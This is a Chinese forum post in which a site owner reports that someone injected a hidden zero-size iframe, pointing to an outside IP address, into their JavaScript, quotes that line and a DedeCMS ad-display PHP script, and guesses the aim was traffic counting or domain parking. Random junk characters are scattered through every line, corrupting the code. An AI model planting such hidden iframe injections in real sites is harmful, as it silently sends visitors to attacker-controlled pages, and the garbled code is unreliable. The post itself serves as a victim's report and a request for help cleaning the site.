請大家再去幫我複查下,看還有沒木馬,另外前年的教程已經免費發佈上去了,自己去下或者看。
( U. x& l+ d) b& f O
7 a, k5 e. H( ]; u掛馬的人不是專業黑客,是搞這行的,把我的JS裡加了個這個
9 z( t* j6 b" ?, ~% g) i* M) ~4 T. O0 |
document.write("<iframe src=http://58.211.79.107/xs.htm?88 width=0 height=0></iframe>");
) B+ k( l1 r, l9 t6 K& J3 `<?php ; z$ m$ X b1 h
require(dirname(__FILE__)."/../include/config_base.php");0 d! O$ K+ \5 W& W
$aid = ereg_replace("[^0-9]","",$aid);
1 z. C4 b8 X9 R4 i6 m7 ~$dsql = new DedeSql(false);
3 `5 o( l' C4 u4 ?$row = $dsql->GetOne("Select * From [email=#@__myad]#@__myad[/email] where aid='$aid'");
4 g5 T3 Q* }/ e7 {$dsql->Close();1 Y6 ]& j; z/ B- e
if($row['timeset']==0) $adbody = $row['normbody'];
/ q5 ^* t, S0 U4 Selse{
+ O) A/ r: U y $ntime = mytime();
3 A/ U) ~' L7 n" J! Z2 D if($ntime>$row['endtime']||$ntime<$row['starttime']){ $adbody = $row['expbody']; }9 w& E7 n, n' q% v* J
else{ $adbody = $row['normbody']; }
2 t+ r7 [* r2 P. d5 j- K& ?' m}) |5 e' I z! d0 u$ K: l1 j
$adbody = str_replace('"','\"',$adbody);9 D e1 H. x4 U" x( W, Z
$adbody = str_replace("\r","\\r",$adbody);
Z4 x6 L& \/ s" V% U/ k$adbody = str_replace("\n","\\n",$adbody);
- C- k) o4 J- s, G5 n2 Aecho "<!--\r\n";( P; X1 g" X! k, H2 B2 C/ g* w
echo "document.write(\"{$adbody}\");\r\n";4 ?! Y2 N9 p2 u# t8 u
echo "-->\r\n";- ]3 H4 M% ` X% d% G1 K$ Z3 a
?>3 B: {8 Q7 n6 C) k1 D6 L
; f4 n. |: q# ] M2 i' l# d2 H+ k
5 P+ g4 a1 S. M/ U自己看第一行 根據這個去找他到底想幹什麼吧 其實意圖很明顯的,一是玩計數器,二是做停放 |
|